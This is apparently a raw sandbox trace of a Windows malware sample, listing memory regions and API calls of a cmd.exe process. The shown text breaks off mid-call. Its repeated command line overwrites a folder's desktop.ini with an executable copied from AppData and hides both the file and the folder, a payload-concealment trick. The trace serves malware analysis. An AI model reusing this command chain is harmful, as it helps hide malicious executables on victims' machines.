\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33649 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33650 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33651 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33652 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 33653 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33654 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33655 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33656 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33657 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 33658 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33741 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33742 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33743 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33744 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 33745 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 33746 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33747 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33748 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33749 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33750 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33751 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33752 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33753 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33754 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33755 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 33756 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33757 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33758 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33759 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 33760 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 33761 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33762 start_va = 0x540000 end_va = 0x640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 33763 start_va = 0x650000 end_va = 0x124ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 33764 start_va = 0x1250000 end_va = 0x13b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001250000" filename = "" Region: id = 33861 start_va = 0x13c0000 end_va = 0x168efff entry_point = 0x13c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 819 os_tid = 0xdac [0225.122] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fe84 | out: lpSystemTimeAsFileTime=0x22fe84*(dwLowDateTime=0xb9bfcb00, dwHighDateTime=0x1d440a9)) [0225.122] GetCurrentProcessId () returned 0xc84 [0225.122] GetCurrentThreadId () returned 0xdac [0225.122] GetTickCount () returned 0x3e291 [0225.122] QueryPerformanceCounter (in: lpPerformanceCount=0x22fe7c | out: lpPerformanceCount=0x22fe7c*=28191152664) returned 1 [0225.123] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0225.123] __set_app_type (_Type=0x1) [0225.123] __p__fmode () returned 0x76b331f4 [0225.123] __p__commode () returned 0x76b331fc [0225.123] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0225.123] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0225.123] GetCurrentThreadId () returned 0xdac [0225.123] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdac) returned 0x38 [0225.123] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.123] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0225.124] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.124] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.124] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fe14 | out: phkResult=0x22fe14*=0x0) returned 0x2 [0225.124] VirtualQuery (in: lpAddress=0x22fe4b, lpBuffer=0x22fde4, dwLength=0x1c | out: lpBuffer=0x22fde4*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.124] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fde4, dwLength=0x1c | out: lpBuffer=0x22fde4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0225.124] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fde4, dwLength=0x1c | out: lpBuffer=0x22fde4*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0225.124] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fde4, dwLength=0x1c | out: lpBuffer=0x22fde4*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.124] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fde4, dwLength=0x1c | out: lpBuffer=0x22fde4*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0225.124] GetConsoleOutputCP () returned 0x1b5 [0225.124] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.124] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0225.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.124] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0225.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.124] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.125] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.125] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.125] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.125] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.125] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.125] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0225.125] GetEnvironmentStringsW () returned 0x2f0458* [0225.125] FreeEnvironmentStringsW (penv=0x2f0458) returned 1 [0225.125] GetEnvironmentStringsW () returned 0x2f0458* [0225.126] FreeEnvironmentStringsW (penv=0x2f0458) returned 1 [0225.126] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ed84 | out: phkResult=0x22ed84*=0x40) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x0, lpData=0x22ed90*=0x8, lpcbData=0x22ed88*=0x1000) returned 0x2 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x4, lpData=0x22ed90*=0x1, lpcbData=0x22ed88*=0x4) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x0, lpData=0x22ed90*=0x1, lpcbData=0x22ed88*=0x1000) returned 0x2 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x4, lpData=0x22ed90*=0x0, lpcbData=0x22ed88*=0x4) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x4, lpData=0x22ed90*=0x40, lpcbData=0x22ed88*=0x4) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x4, lpData=0x22ed90*=0x40, lpcbData=0x22ed88*=0x4) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x0, lpData=0x22ed90*=0x40, lpcbData=0x22ed88*=0x1000) returned 0x2 [0225.126] RegCloseKey (hKey=0x40) returned 0x0 [0225.126] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ed84 | out: phkResult=0x22ed84*=0x40) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x0, lpData=0x22ed90*=0x40, lpcbData=0x22ed88*=0x1000) returned 0x2 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x4, lpData=0x22ed90*=0x1, lpcbData=0x22ed88*=0x4) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x0, lpData=0x22ed90*=0x1, lpcbData=0x22ed88*=0x1000) returned 0x2 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x4, lpData=0x22ed90*=0x0, lpcbData=0x22ed88*=0x4) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x4, lpData=0x22ed90*=0x9, lpcbData=0x22ed88*=0x4) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x4, lpData=0x22ed90*=0x9, lpcbData=0x22ed88*=0x4) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x0, lpData=0x22ed90*=0x9, lpcbData=0x22ed88*=0x1000) returned 0x2 [0225.127] RegCloseKey (hKey=0x40) returned 0x0 [0225.127] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b9 [0225.127] srand (_Seed=0x5b8863b9) [0225.127] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"" [0225.127] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"" [0225.127] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.127] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2f1bb8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0225.127] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.127] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.127] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.127] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0225.127] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0225.127] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0225.128] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0225.128] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0225.128] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0225.128] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0225.128] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0225.128] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0225.128] GetEnvironmentStringsW () returned 0x2f25a8* [0225.128] FreeEnvironmentStringsW (penv=0x2f25a8) returned 1 [0225.128] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.128] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.128] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0225.128] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0225.128] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0225.128] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0225.128] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0225.128] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0225.128] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0225.128] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0225.128] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22fb50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.128] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22fb50, lpFilePart=0x22fb4c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22fb4c*="Desktop") returned 0x18 [0225.128] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.128] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f8cc | out: lpFindFileData=0x22f8cc) returned 0x2f0c38 [0225.129] FindClose (in: hFindFile=0x2f0c38 | out: hFindFile=0x2f0c38) returned 1 [0225.129] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f8cc | out: lpFindFileData=0x22f8cc) returned 0x2f0c38 [0225.129] FindClose (in: hFindFile=0x2f0c38 | out: hFindFile=0x2f0c38) returned 1 [0225.129] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f8cc | out: lpFindFileData=0x22f8cc) returned 0x2f0c38 [0225.129] FindClose (in: hFindFile=0x2f0c38 | out: hFindFile=0x2f0c38) returned 1 [0225.129] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.129] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0225.129] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0225.129] GetEnvironmentStringsW () returned 0x2f0458* [0225.129] FreeEnvironmentStringsW (penv=0x2f0458) returned 1 [0225.129] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.130] GetConsoleOutputCP () returned 0x1b5 [0225.130] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.130] GetUserDefaultLCID () returned 0x409 [0225.130] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0225.130] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fc90, cchData=128 | out: lpLCData="0") returned 2 [0225.130] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fc90, cchData=128 | out: lpLCData="0") returned 2 [0225.130] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fc90, cchData=128 | out: lpLCData="1") returned 2 [0225.130] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0225.131] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0225.132] GetConsoleTitleW (in: lpConsoleTitle=0x2e0a98, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.132] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.132] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0225.132] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0225.132] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0225.133] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0225.133] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0225.133] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0225.133] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0225.133] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0225.133] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0225.133] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0225.135] _wcsicmp (_String1="del", _String2=")") returned 59 [0225.135] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0225.135] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0225.135] _wcsicmp (_String1="IF", _String2="del") returned 5 [0225.135] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0225.135] _wcsicmp (_String1="REM", _String2="del") returned 14 [0225.135] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0225.137] _wcsicmp (_String1="type", _String2=")") returned 75 [0225.137] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0225.137] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0225.137] _wcsicmp (_String1="IF", _String2="type") returned -11 [0225.137] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0225.137] _wcsicmp (_String1="REM", _String2="type") returned -2 [0225.137] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0225.393] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.393] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0225.399] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.400] FindClose (in: hFindFile=0x2f0638 | out: hFindFile=0x2f0638) returned 1 [0225.400] FindClose (in: hFindFile=0x2f0638 | out: hFindFile=0x2f0638) returned 1 [0225.400] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0225.400] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0225.400] GetConsoleTitleW (in: lpConsoleTitle=0x22f6b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.400] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f540, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f608 | out: lpAttributeList=0x22f540, lpSize=0x22f608) returned 1 [0225.400] UpdateProcThreadAttribute (in: lpAttributeList=0x22f540, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f600, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f540, lpPreviousValue=0x0) returned 1 [0225.400] GetStartupInfoW (in: lpStartupInfo=0x22f4fc | out: lpStartupInfo=0x22f4fc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0225.400] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0225.401] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" ", lpProcessAttributes=0x0, 